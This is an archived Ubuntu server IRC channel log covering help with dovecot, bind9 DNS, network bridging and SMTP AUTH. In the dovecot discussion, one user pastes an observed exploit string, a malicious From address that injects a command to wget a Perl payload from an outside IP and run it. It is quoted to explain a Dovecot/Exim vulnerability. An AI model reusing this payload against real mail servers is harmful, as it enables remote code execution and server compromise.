/srv/irclogs.ubuntu.com/2013/09/08/#ubuntu-server.txt

brad9001hello all, I just set up dovecot and I wanted to see what email client you guys would recommend because I dont like thunderbird00:39
Pastafarianmatter of personal taste.00:41
PastafarianI've only used outlook and thunderbird. I stick to the latter.00:41
brad9001well I can never get thunderbird to work and it pisses me off because i love it for my gmail accounts00:41
brad9001Ill look into outlook though00:42
Pastafarianin terms of more than a email client outlook is fantastic00:42
Pastafarianbut it's more suited to business work, meetings, calendar etc...00:42
Pastafarianworks fine as an email client00:43
brad9001oh, well what would you reccomend besides thunderbird?00:44
Pastafarianbesides outlook, no idea00:45
Pastafariannever used anything00:45
Pastafarianyou might want to look into mailpile if you are interested in encryption00:45
brad9001ok will do thanks @pastafarian00:51
brad9001@pastafarian you there? would you mind helping me with dovecot-postfix setup?01:11
PastafarianSorry, I haven't done dovecot before.01:15
PastafarianThere are a few good guides knocking around on the ubuntu wiki somewhere.01:15
ScottKThe configuration in Ubuntu Server Guide (see /topic) works.01:17
PastafarianI am not entirely sure that the implementation there is secure01:17
PastafarianThere was a recent dovecot exploit that worked and there was no imput sanitisation on dovecot when it got stuff passed from postfix01:18
Pastafarianthey could run arbitrary commands by embeding them into the headers of the email01:18
ScottKLink?01:18
Pastafarianreply to address I seem to remember01:18
Pastafarianone second, it might not apply here, I need to find the link01:18
PastafarianI saw them try to do it on my mail server, but I am not using dovecot01:19
Pastafarianthe offending string itself was the from address01:22
Pastafarianfrom=<x`wget${IFS}-O${IFS}/tmp/p.pl${IFS}188.130.34.244/p``perl${IFS}/tmp/p.pl`@blaat.co$01:22
ScottKInteresting.01:24
ScottKI don't think there's anything in the way one configures dovecot that would affect if it did input validation on the From address or not.01:24
PastafarianI remember the link saying it was the return path01:25
Pastafarianthat something when passed executed this01:26
PastafarianIt might have been an EXIM dovecot config however01:26
=== peter is now known as Guest64994
Pastafariantrying to find the original email as that is from my emails to the relevant abuse@ addresses01:26
=== freeflying is now known as freeflying_away
=== LargePrime is now known as Guest94883
PastafarianScottK, https://isc.sans.edu/diary/Dovecot++Exim+Exploit+Detects/1624301:32
ScottKThanks.01:33
ScottKShouldn't be a problem with postfix/lmtp.01:33
Pastafarianindeed01:33
PastafarianRusty memory01:33
Pastafarianthat being said, they imply the default config for exim and dovecot is the cause01:33
Pastafarianwhich is worrying01:33
PastafarianI reported that to 3 different businesses and got no replies from any of them.01:34
Pastafarianall of them directly responsible for providing this hacker with services01:34
ScottKI wonder if it had a CVE.01:36
PastafarianI don't think it did at the time but I cannot be sure about that01:36
Pastafarianeither way the logs are misleading01:37
Pastafarianthe email contained no From:01:37
Pastafarianonly the reply-to:01:37
Pastafarianthe headers themselves on that mail gave it away01:37
=== LargePrime_ is now known as LargePrime
PastafarianScottK, server guide doesnt cover courier which is surprising01:53
=== freeflying_away is now known as freeflying
LargePrimehow tangential a discussion are we allowed hear?02:05
LargePrimelike i hear ovh is out of servers02:05
Pastafarianis that even possible?02:05
LargePrimeand am looking for mor info02:05
PastafarianThey're a hosting company02:06
Pastafarianthey'd just buy more servers02:06
LargePrimeIt seems they have no servers?02:06
Pastafarianseems unlikely02:06
LargePrimeintell stopped making the CPU they use02:06
Pastafarianthey'd just tide over using EC2 or something02:06
PastafarianLargePrime, that isn't going to stop them.02:06
LargePrimewell the sp packages are now at 72 hours till available02:06
PastafarianThey'll just use a different CPU02:07
LargePrimebut i hear that after you order they are taking weeks to fill02:07
Pastafarianseems unlikely for such a large company to have screwed it up that badly02:07
LargePrimebut all this is hearsay02:07
LargePrimethats why i bug people like yous02:07
LargePrimeBut the SP1's used to fill in 20 min flat02:07
LargePrimeand the web site now say 72 hours02:08
LargePrimeand there are a few web acounts of others not getting servers for weeks02:08
Pastafarianwell, it's not impossible for it to happen02:09
Pastafarianbut it's like hearing that amazon ec2 ran out of servers02:09
LargePrimehttp://forum.ovh.co.uk/showthread.php?t=717602:11
Pastafarianha02:12
Pastafarianevery time I look at VPS's I cringe02:12
Pastafarianso expensive02:12
PastafarianI have a geolocated octacore with 16gb of RAM for free02:12
Pastafarianif I wanted something similar from a VPS host I am looking at 10k annually02:12
PastafarianGotta love universities eh?02:13
=== freeflying is now known as freeflying_away
FireAnyone can give me a hand with bind9 config im having issues with.10:04
FireIm probably just forgetting something really stupid.10:07
=== Burrnn is now known as Fire
FireAnyone can give me a hand with bind9 issue - using Dig it resolves but when pointed to webserver it doesnt10:45
ikoniawhen pointed at a webserver ?10:45
FireAs in i pointed my domain name to my server with NS records; but it wotn resolve10:46
ikoniayou just said it resolved with dig10:46
Firewhen I ssh internally it resolves10:46
ikoniaFire: is this domain name on the public internet10:46
Fireyes10:46
ikoniawhat is the domain name10:47
Firemoddl.com10:47
ikoniaName Server: KS200136.KIMSUFI.COM10:47
ikoniaName Server: NS.KIMSUFI.COM10:47
ikoniaName Server: NS11.OVH.NET10:47
ikoniaare they your name servers ?10:47
Firethats correct10:47
ikoniaFire: what is the FQDN you are trying to resolve10:47
Fire*.moddl.com.10:49
ikoniacan you give me a valid host10:49
ikoniaeg: test01.moddl.com10:49
ikoniawhen did you update these records ?10:50
Firefew hours ago - was trying to get just moddl.com. to work first then ill fiddle with subdomains10:50
ikoniaok, so it's probably not propogated yet10:50
ikoniaas my dns server is showing no records10:50
Firenever had the issue before10:50
ikoniaI can't get a response from ns.kimsufi.com10:52
sgranFire: when I ask your nameservers directly, none of them respond with an soa record10:52
Firehmm10:52
Fireits first time ive tried to setup dns on a kimsufi/ovh10:52
ikoniaFire: it's showing they are not soa10:52
ikoniaand I can't do recursion, so it rejects me10:53
sgranns.kimsufi.com and ns11.ovh.net give me 'recursion requested but not available' and ks200136.kimsufi.com does not answer10:53
ikoniasgran: confirmed10:53
sgranI'd suggest that you have not configured them to be authoritative for the domain?10:53
ikoniaseems the logical conclusion10:54
Firelet me check10:54
Fiream pretty sure i did10:54
Fire3820075510:59
Firemoddl.com.      IN      SOA     ns1.moddl.com. admin.moddl.com. (10:59
Fireany other ideas11:07
FireIm thinking about just changing the records at the registrar11:07
Firesgran any other ideas11:33
sgranFire: the .com registrar says that moddl.com is served by kimsufi/ovh11:34
FireIt is11:34
sgranI think the simplest is going to be letting kisufi/ovh know about this11:34
FireKimsufi support are beyond useless11:34
sgranhmm.  This begs the question - why are you using them? :)11:36
FireCheap :)11:37
FireRidicuolously so in fact11:37
sgranI might be seeing why11:38
FireI used 2 kimsufis in the past as seedboxes - if you are peering mostly to europe / canada its crazy good value11:38
sgranin fact, I'm going to set up a new business11:38
sgranpay me £5/year, and I'll pretend to host DNS for you11:38
sgranof course, I won't actually do anything but collect your money11:39
sgranbut it will be cheap :)11:39
FireTo put it in perspective i transferred ~25TB in a month.11:39
Firewhich for £6.30 for 2 servers is quite good value11:39
FireFor my business i use elsewhere - but I dont really wanna spend £60/month for a personal server for tinkering11:41
Nox_404Hi, i made a mistake, on an ubuntu server 12.04 i create a bridge between eth0 and another bridge (i wrote the wrong iface) so now i can't reconnect this server ! (using ssh). If i reboot the server will my connection be back ?13:12
Nox_404please answer me13:14
bekksNox_404: Do you have any other chance other than rebooting now?13:15
Nox_404bekks: thats a remote server and i don't have any other way to connect this server13:16
bekksThen you have no other option left.13:17
bekksSo it doesnt matter what we tell you, you have to reboot.13:17
Nox_404bekks: ok so i'll try that13:18
Nox_404bekks: thanks13:18
bekksThank yourself ;)13:18
patdk-laphow would we know if a reboot would help?13:24
patdk-lapyou lacked to tell us how to did it, what files you modified.13:25
bekksThere is no other chance than rebooting.13:25
Nox_404patdk-lap: I used `brctl addif iface iface`13:26
bekksNox_404: So did you reboot it?13:28
Nox_404bekks: I have to wait for a friend to reboot it, like i said i don't have access to this server13:29
Nox_404bekks: I must wait for tonight ....13:29
bekksNox_404: Does your friend have physical access?13:29
Nox_404bekks: yes13:29
bekksSo there even is a way to fix it if rebooting doesnt help.13:30
bekksYou should have told us about those details.13:30
Nox_404bekks: but he doesn't know anything about ubuntu..13:30
bekksYou can tell him what he needs to do.13:30
bekksYou can screw his server, you can tell him to reboot it - so you can tell him what to do. :)13:30
Nox_404i just wanted to know if rebooting is enouth to fix it13:31
bekkswe dont know.13:31
=== freeflying is now known as freeflying_away
plasmenhello17:53
plasmencan you help me with something17:53
plasmenI am missing the 250-AUTH LOGIN PLAIN and 250-AUTH=LOGIN PLAIN17:53
plasmenany ideas?17:54
Nox_404bekks: My friend reboot it and it works fine, brctl doesn't keep the configuration after a reboot18:40
=== dr0pix is now known as RogerThat
=== RogerThat is now known as dr0pix
=== Firartix is now known as Fira
=== lifeless_ is now known as lifeless
=== freeflying is now known as freeflying_away
=== freeflying_away is now known as freeflying
=== freeflying is now known as freeflying_away

Generated by irclog2html.py 2.7 by Marius Gedminas - find it at mg.pov.lt!